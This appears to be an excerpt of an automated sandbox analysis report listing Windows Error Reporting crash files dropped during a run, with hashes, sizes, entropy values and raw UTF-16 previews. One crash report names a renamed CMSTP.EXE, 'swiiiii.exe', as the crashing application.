                                                                                                                                                                                                                                        SHA-256:BD8E9EF52130519A117386894F983D7F9889FAA7E0A5C604337EF161DEF884D2
                                                                                                                                                                                                                                        SHA-512:036277E61C7B65586FE605F5B26F8468F4C582AA091F04A861E8C720DD401FA1B1AA4ACB5C87F0D9B2210BC3D6918B4EA677711902A63F1F9C6A55D932A1D50D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.7.4.5.0.7.1.4.1.8.2.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.7.4.5.0.7.9.3.8.7.0.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.8.8.c.d.9.7.-.5.e.a.f.-.4.e.3.e.-.b.2.c.a.-.e.3.7.7.7.c.a.5.4.d.2.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.7.7.7.f.c.d.-.7.b.1.5.-.4.6.c.8.-.8.4.b.a.-.9.3.c.9.0.2.a.4.b.7.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.w.i.i.i.i.i...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.M.S.T.P...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.f.7.c.-.0.0.0.1.-.0.0.1.4.-.3.2.b.8.-.e.7.5.7.b.5.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.f.4.0.2.9.a.9.7.d.3.e.3.4.2.c.a.a.8.8.8.2.3.7.5.d.c.b.c.2.b.1.0.0.0.0.0.9.0.4.!.0.0.0.0.3.3.a.e.d.a.d.b.5.3.6.1.f.1.6.4.6.c.f.f.d.6.8.7.9.1.d.7.2.b.a.5.f.1.4.2.4.1.1.4.!.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1052.tmp.dmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Tue Apr 23 19:35:07 2024, 0x1205a4 type
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):174325
                                                                                                                                                                                                                                        Entropy (8bit):3.8864790837979
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:nUw7DSVXSwypN4uE2aOh3LTgiABS2stTSgAJp8VCDkBuBojRDxk:n77Dy04uEqFLTgAFqAAcF
                                                                                                                                                                                                                                        MD5:EDE606A4665AD2AA49FCB91DA3F6A804
                                                                                                                                                                                                                                        SHA1:BDAECA326BEF49A67E89E5CFC02FA84C799EA74E
                                                                                                                                                                                                                                        SHA-256:7D7454CE899CCB003B0C9E0A2B7AE54D23D7E6B620F282BFBB0E0EE918AA6124
                                                                                                                                                                                                                                        SHA-512:24F7337A93FA8D54E22D2A4CE8F138AEB2A529539758E4E1634C3CB6336610E75EE039A544EFD202D0DF163C62230F087AC2B10FDDA4C60603EC3E389FBA3439
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MDMP..a..... .......k.(f....................................<...........t...Z9..........`.......8...........T...........P$..........................................................................................................eJ......d.......GenuineIntel............T.......|/..i.(f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER11F9.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8316
                                                                                                                                                                                                                                        Entropy (8bit):3.697533371576593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJNO6uG6Y1l6xoE1gmfM4JBHpr189bEbzsfNKjm:R6lXJk6v6YX6xoE1gmfM4J+EbYf06
                                                                                                                                                                                                                                        MD5:A093D053D1CBA3ED6B16DF1153CA2031
                                                                                                                                                                                                                                        SHA1:909AB71DE4DD48E2E480A652910BAE338723CDC1
                                                                                                                                                                                                                                        SHA-256:84B56F63ADD33E44D04C0278D4060CCC71D32841BCFAAAC4ACD4ADF1463FB74D
                                                                                                                                                                                                                                        SHA-512:C8A52FCE9B14B3F65B3D6540A89B6995AA62C3EF2F0CEB46577E43C078971C8508BBB1B207FB7F0BE9A98262862A0806DFBEE7830092C974132C344FE9D55C71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.1.5.6.<./.P.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1238.tmp.xml

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4652
                                                                                                                                                                                                                                        Entropy (8bit):4.486942259536543
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsqJg77aI9f0WpW8VYfYm8M4JlAFMo+q8wBx5ym3Z01RWd:uIjf4I7Rt7VvJon5yAZ0TWd
                                                                                                                                                                                                                                        MD5:697124AE7FCE73C59EA43D496A0683DB
                                                                                                                                                                                                                                        SHA1:2CAE5BE88CD4CB7F109307BA30972ABE13B2EDB9
                                                                                                                                                                                                                                        SHA-256:01AF7FBB3F391BE1DDC42A909F69373DA2BD248992E3BA00AC930E42D0217751
                                                                                                                                                                                                                                        SHA-512:8E75B69950C87811C54D861583C5FA568F8195A03046F540BF9C5F2E3114534F9C09C2DBE0D07193B4AB388B48F1E15B18120C46B327015BC45276A966D3A3A1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292957" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER126B.tmp.csv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):90178
                                                                                                                                                                                                                                        Entropy (8bit):3.0360605669732683
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:ZukiUFhpUr2T1Iowy9fWBgRNtak+z+Y+y+nXvu+4+soH+E+D+q+O+E+2+f+H+T+o:ZukiUFhpUr2T1Iowy9fWBgRNtak+z+Y+
                                                                                                                                                                                                                                        MD5:C532E99F0C4097F5705DBE22C3FA7C92
                                                                                                                                                                                                                                        SHA1:22A69F6D927610F55B70AF5469873C01D32AF184
                                                                                                                                                                                                                                        SHA-256:E0F5EE547593794B955E6B7307FE0CDFBE79D57AD2D04F96321DB003985FAD77
                                                                                                                                                                                                                                        SHA-512:07BB09EFCD26049EF0B9739969CC81F00658A322FE8CE446C1995C6190CF850E5B1D926EE954687334A2C1C45A5E58DD6CB8532044342FB89264F27C46C7C2F1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1328.tmp.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.686961639800154
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYWBylWWKVo9YpYaWbZHbYEZwptCi0EBCMwj6++aFdnM8QMbAIHdJ3:2ZDB+9uogGaaFdnM5KXHr3
                                                                                                                                                                                                                                        MD5:C782B2B6378D04506C6FE123B21EB8B8
                                                                                                                                                                                                                                        SHA1:C26E83661A758ACC960C77FBC4E066CE2D9C70EE
                                                                                                                                                                                                                                        SHA-256:D51F957937E4CEE1705E4ACE31820251904454B0390E1857827868C97DA193AF
                                                                                                                                                                                                                                        SHA-512:5533D62719ADE5925386EEAF92D3FF16302B553D6BE2FD44EE256C7160E30234CE874E8AE9F853F5481C2247B39155ACD1E71651060AAC7FE91FC326F6607FA7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER276C.tmp.csv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):92312
                                                                                                                                                                                                                                        Entropy (8bit):3.0343471670215307
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:ibLRYqa9DND8IowOXFfhBnItEk+z+Y+y+nXvu+4+soH+E+D+q+O+E+2+f+H+T+jQ:ibLRYqa9DND8IowOXFfhBnItEk+z+Y+d
                                                                                                                                                                                                                                        MD5:8FF08FC5C4D9F1D9661A3946077CA511
                                                                                                                                                                                                                                        SHA1:5BD6607C2C5DEC21E03328F7B090827FCC27F01A
                                                                                                                                                                                                                                        SHA-256:D5478E78B37403029B6D3C193BBE9B9B341475CA3F55E984011195BE0A67979F
                                                                                                                                                                                                                                        SHA-512:0651345EFBD5D933D57F5ACA32C2EC74B924255166E081D86F8060928E989B1F7F501E201849B5A2723728B476CEB8DBB7957D4A95FC9BE21A3A309478452058
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2981.tmp.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.6939493729651596
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYWWTselxhYLYWW9OHUnYEZFxltCiWE3C9wwX++adMaMiSbIIAY:2ZDa8uxq5adMaMiSUIAY
                                                                                                                                                                                                                                        MD5:608BA86C6F9FD81F82785B11120C80D5
                                                                                                                                                                                                                                        SHA1:116BAAEC56C8DF46DDEDA37B0DA932E20FFF9CD4
                                                                                                                                                                                                                                        SHA-256:0EAF56AECA0519E3BE6B9CC437BB70AAEAC2ECEE4F9E1046F8622779AA825637
                                                                                                                                                                                                                                        SHA-512:14FEDD4442EE3C0D6B5A5BF34A700678080CE886E1B569F6791023C8DBC6EBEC57FB896E33806626A9970F7757396E548F0E8BD79E8E11FBA579BEAB1967AC22
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A19.tmp.csv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):90578
                                                                                                                                                                                                                                        Entropy (8bit):3.0363154147938087
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:xWHcAwEwPbMtqyokiHibk+z+Y+y+nXvu+4+soH+E+D+q+O+E+2+f+H+T+jWd+Df+:xWHcAwEwPbMtqyokiHibk+z+Y+y+nXvF
                                                                                                                                                                                                                                        MD5:4CAB3B67E793A2A798D8829249DB1F07
                                                                                                                                                                                                                                        SHA1:8C3522F942C8B4CBB54942BF7CB29D921184084E
                                                                                                                                                                                                                                        SHA-256:2EAE9BCC381E37B8D4B34DA8C523E0FF0A90CD58919D6193FF33392BB6515D29
                                                                                                                                                                                                                                        SHA-512:C025430E46FAFC38D3837B74BBFB63B5BA26B0A73FC764F810037B516E8473D5A92C5E70885D5ED1509F39B01F672B0C0184F5C9CF73F977C253E835AA117238
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B05.tmp.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.6939372777408814
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYWUG3nAcYKFYvYayWOHLYEZTftCilEIcCXwkIv9takMFpMsSFmIglAFD:2ZD7xFICqHakMFpMsSFhglAFD
                                                                                                                                                                                                                                        MD5:98BE74D69FE5FCF0078D47E8AB5AFA8B
                                                                                                                                                                                                                                        SHA1:A543D7B54E4BB75FE6CC9D91E3837C15B615A9CC
                                                                                                                                                                                                                                        SHA-256:FED0C3D638F02C015A884FD4F052492AB714E802CBFB18D2180441614ECF4211
                                                                                                                                                                                                                                        SHA-512:692E3E1B4DCE0A02DFFA05AA98482F494A9E3076B6C2F2E9CEE3A6BD5B9F8A5FE05207032015EB19893F8C300B08354970E348B9B4AF40D2F2B054CC4BFE89B4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F78.tmp.csv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):91584
                                                                                                                                                                                                                                        Entropy (8bit):3.03462289602953
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Nmt0zA5EV9Sv71c846ov0bk+z+Y+y+nXvu+4+soH+E+D+q+O+E+2+f+H+T+jWd+W:Nmt0zA5EV9Sv71c846ov0bk+z+Y+y+nR
                                                                                                                                                                                                                                        MD5:5CBE1662247A39A3990D129CC4318ADA
                                                                                                                                                                                                                                        SHA1:05B6DA030D90DDDC24944A80F014BCB5A82EC5F1
                                                                                                                                                                                                                                        SHA-256:D294B22EABDDE7D2711869F92A158FB4FDBC29A4A6FBFB213692A22EC2ECAF67
                                                                                                                                                                                                                                        SHA-512:641FAADAA149530DA918584E7A876BDFF330A926D36FFA7CACE5D26CB4D3204A9DAFD58BC2BBB1BD86BD5DB00E05FC09BB6E18F098FEA55176F4F441687D8A6E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
